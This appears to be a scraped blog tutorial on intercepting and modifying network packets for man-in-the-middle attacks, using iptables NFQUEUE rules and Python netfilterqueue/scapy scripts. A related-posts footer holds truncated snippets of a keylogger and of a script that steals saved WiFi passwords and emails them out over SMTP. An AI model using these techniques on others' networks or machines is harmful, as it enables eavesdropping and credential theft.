Python Ethical Hacking - Intercepting and Modifying Packets

INTERCEPTING & MODIFYING PACKETS

Scapy can be used to:

  • Create packets.
  • Analyze packets.
  • Send/receive packets.

But it can‘t be used to intercept packets/flows.

CLASSIC MITM SCENARIO

 MITM - SNIFFING DATA

 MITM - MODIFYING DATA

1. Execute the command - iptables to capture the packets into a queue.

iptables -I INPUT -d 10.0.0.0/24 -j NFQUEUE --queue-num 1

2. Access the Packets queue.

Install the module netfilterqueue first.

pip3 install -U git+https://github.com/kti/python-netfilterqueue

3. Write the Python script to intercept and process the packets.

#!/usr/bin/env python
from netfilterqueue import NetfilterQueue

def process_packet(packet):
    print(packet)
    packet.accept()

queue = NetfilterQueue()
queue.bind(1, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print(‘‘)

We can also drop the packets through function packet.drop().

4. Use the following command to stop the packet capturing.

iptables --flush

Converting Packets to Scapy Packets

1. Execute the iptables command to capture the OUTPUT and INPUT packets.

iptables -I OUTPUT -j NFQUEUE --queue-num 0

iptables -I INPUT -j NFQUEUE --queue-num 0

2. Execute the following Python script to process the captured packets.

#!/usr/bin/env python
from netfilterqueue import NetfilterQueue

def process_packet(packet):
    print(packet)
    packet.accept()

queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print(‘‘)

3. Convert the packet to scapy packet and show on the screen.

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP

def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    print(scapy_packet.show())
    packet.accept()

queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print(‘‘)

4. Stop the capture of the packet by the command.

iptables --flush

原文地址:https://www.cnblogs.com/keepmoving1113/p/11442423.html

时间: 2024-11-06 03:55:53

Python Ethical Hacking - Intercepting and Modifying Packets的相关文章

Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

Refactoring and Housekeeping: #!/usr/bin/env python import re from netfilterqueue import NetfilterQueue from scapy.layers.inet import TCP, IP from scapy.packet import Raw def set_load(packet, load): packet[Raw].load = load del packet[IP].len del pack

Python Ethical Hacking - Bypass HTTPS

HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. -> not secure Solution: Use HTTPS. HTTPS is an adaptation of HTTP. Encrypt HTTP using TLS(Transport Layer Security) or SSL(Secure Sockets Layer). ARP

Python Ethical Hacking - BACKDOORS(8)

Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specific resources. Result: They work on any OS with a python interpreter. If packaged, they will work on any OS if even if python is NOT installed. 原文地址:htt

Python Ethical Hacking - Basic Concetion

What is Hacking? Gaining unauthorized access. Hackers? 1.Black-hat Hackers 2.White-hat Hackers 3.Grey-hat Hackers WHAT IS A PROGRAM? A set of instructions to do a certain task or solve a problem. 原文地址:https://www.cnblogs.com/keepmoving1113/p/11332855

Python Ethical Hacking - Bypass HTTPS(2)

Injecting Code in HTTPS Pages: #!/usr/bin/env python import re from netfilterqueue import NetfilterQueue from scapy.layers.inet import TCP, IP from scapy.packet import Raw def set_load(packet, load): packet[Raw].load = load del packet[IP].len del pac

Python Ethical Hacking - Malware Analysis(2)

Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.se

Python Ethical Hacking - Malware Analysis(3)

Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) ser

Python Ethical Hacking - Malware Analysis(4)

DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. Simple but powerfull. Can be used in many situations: download _file + execute_command = download_and_execute download_file + execute_and_report = do

Python Ethical Hacking - KEYLOGGER(2)

Report function: Run in the background. Don't interrupt program execution. Every X seconds, send the report. ->Great case for threading. #!/usr/bin/env python import threading import pynput.keyboard log = "" def process_key_press(key): global